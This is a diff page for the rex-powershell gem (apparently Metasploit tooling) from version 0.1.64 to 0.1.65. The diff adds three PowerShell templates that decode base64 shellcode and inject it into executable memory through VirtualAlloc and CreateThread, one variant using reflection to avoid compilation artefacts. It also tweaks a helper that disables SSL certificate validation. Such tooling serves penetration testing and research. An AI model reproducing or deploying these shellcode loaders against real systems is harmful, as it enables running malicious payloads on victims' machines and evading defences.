rex-powershell 0.1.64 → 0.1.65
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/data/templates/to_mem_dotnet.ps1.template +30 -0
- data/data/templates/to_mem_old.ps1.template +20 -0
- data/data/templates/to_mem_pshreflection.ps1.template +27 -0
- data/lib/rex/powershell.rb +1 -0
- data/lib/rex/powershell/psh_methods.rb +1 -1
- data/lib/rex/powershell/templates.rb +19 -0
- data/lib/rex/powershell/version.rb +1 -1
- metadata +6 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 7822116e9e48c0d7ee82d13dac3ca52079e470ba
|
4
|
+
data.tar.gz: c950c71437f158f5fca8bd307671b04812619b34
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: b9846114f3bb39ecd7dd3a5ab424918ddd1d974c59c4939173a514d213b0b1cc30a6040d63cab575f1f14b62665e8311c18f79ccef14be98fcc10c81f1221c1d
|
7
|
+
data.tar.gz: 3f69f77edd8116afeb60279c2e95de5a1d6a8ad685f58688519ec41be9f231600a821ee15637d155cf607e4b9ba3165b30f1c938e5d639e4a48b8de95ebb2bc7
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
@@ -0,0 +1,30 @@
|
|
1
|
+
Set-StrictMode -Version 2
|
2
|
+
$%{var_syscode} = @"
|
3
|
+
using System;
|
4
|
+
using System.Runtime.InteropServices;
|
5
|
+
namespace %{var_kernel32} {
|
6
|
+
public class func {
|
7
|
+
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
8
|
+
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
|
9
|
+
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
10
|
+
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
11
|
+
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
12
|
+
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
13
|
+
}
|
14
|
+
}
|
15
|
+
"@
|
16
|
+
|
17
|
+
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
|
18
|
+
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
|
19
|
+
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
|
20
|
+
$%{var_compileParams}.GenerateInMemory = $True
|
21
|
+
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
22
|
+
|
23
|
+
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
24
|
+
|
25
|
+
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
26
|
+
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
27
|
+
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
28
|
+
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
29
|
+
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
30
|
+
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
|
@@ -0,0 +1,20 @@
|
|
1
|
+
$%{var_syscode} = @"
|
2
|
+
[DllImport("kernel32.dll")]
|
3
|
+
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
4
|
+
[DllImport("kernel32.dll")]
|
5
|
+
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
6
|
+
[DllImport("msvcrt.dll")]
|
7
|
+
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
8
|
+
"@
|
9
|
+
|
10
|
+
$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
|
11
|
+
|
12
|
+
%{shellcode}
|
13
|
+
|
14
|
+
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
|
15
|
+
|
16
|
+
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
|
17
|
+
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
18
|
+
}
|
19
|
+
|
20
|
+
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
|
@@ -0,0 +1,27 @@
|
|
1
|
+
function %{func_get_proc_address} {
|
2
|
+
Param ($%{var_module}, $%{var_procedure})
|
3
|
+
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
|
4
|
+
|
5
|
+
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
|
6
|
+
}
|
7
|
+
|
8
|
+
function %{func_get_delegate_type} {
|
9
|
+
Param (
|
10
|
+
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
|
11
|
+
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
|
12
|
+
)
|
13
|
+
|
14
|
+
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
|
15
|
+
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
16
|
+
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
17
|
+
|
18
|
+
return $%{var_type_builder}.CreateType()
|
19
|
+
}
|
20
|
+
|
21
|
+
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
22
|
+
|
23
|
+
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
24
|
+
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
25
|
+
|
26
|
+
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
27
|
+
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
data/lib/rex/powershell.rb
CHANGED
@@ -70,7 +70,7 @@ module Powershell
|
|
70
70
|
# @return [String] Powershell code to disable SSL verification
|
71
71
|
# checks.
|
72
72
|
def self.ignore_ssl_certificate
|
73
|
-
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}'
|
73
|
+
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
|
74
74
|
end
|
75
75
|
|
76
76
|
#
|
@@ -0,0 +1,19 @@
|
|
1
|
+
module Rex
|
2
|
+
module Powershell
|
3
|
+
module Templates
|
4
|
+
|
5
|
+
# The base directory that all Powershell script templates live in
|
6
|
+
TEMPLATE_DIR = File.expand_path( File.join( __FILE__ , '..', '..', '..', '..', 'data', 'templates') )
|
7
|
+
|
8
|
+
# The powershell script template for memory injection using .NET
|
9
|
+
TO_MEM_DOTNET = File.join(TEMPLATE_DIR, 'to_mem_dotnet.ps1.template')
|
10
|
+
|
11
|
+
# The powershell script template for memory injection using reflection
|
12
|
+
TO_MEM_REFLECTION = File.join(TEMPLATE_DIR, 'to_mem_pshreflection.ps1.template')
|
13
|
+
|
14
|
+
# The powershell script template for memory injection using the old method
|
15
|
+
TO_MEM_OLD = File.join(TEMPLATE_DIR, 'to_mem_old.ps1.template')
|
16
|
+
|
17
|
+
end
|
18
|
+
end
|
19
|
+
end
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-powershell
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.65
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- David 'thelightcosine' Maloney
|
@@ -85,7 +85,7 @@ cert_chain:
|
|
85
85
|
2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
|
86
86
|
QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
|
87
87
|
-----END CERTIFICATE-----
|
88
|
-
date: 2016-
|
88
|
+
date: 2016-10-03 00:00:00.000000000 Z
|
89
89
|
dependencies:
|
90
90
|
- !ruby/object:Gem::Dependency
|
91
91
|
name: bundler
|
@@ -175,6 +175,9 @@ files:
|
|
175
175
|
- Rakefile
|
176
176
|
- bin/console
|
177
177
|
- bin/setup
|
178
|
+
- data/templates/to_mem_dotnet.ps1.template
|
179
|
+
- data/templates/to_mem_old.ps1.template
|
180
|
+
- data/templates/to_mem_pshreflection.ps1.template
|
178
181
|
- lib/rex/powershell.rb
|
179
182
|
- lib/rex/powershell/command.rb
|
180
183
|
- lib/rex/powershell/function.rb
|
@@ -185,6 +188,7 @@ files:
|
|
185
188
|
- lib/rex/powershell/payload.rb
|
186
189
|
- lib/rex/powershell/psh_methods.rb
|
187
190
|
- lib/rex/powershell/script.rb
|
191
|
+
- lib/rex/powershell/templates.rb
|
188
192
|
- lib/rex/powershell/version.rb
|
189
193
|
- rex-powershell.gemspec
|
190
194
|
homepage: https://github.com/rapid7/rex-powershell
|
metadata.gz.sig
CHANGED
Binary file
|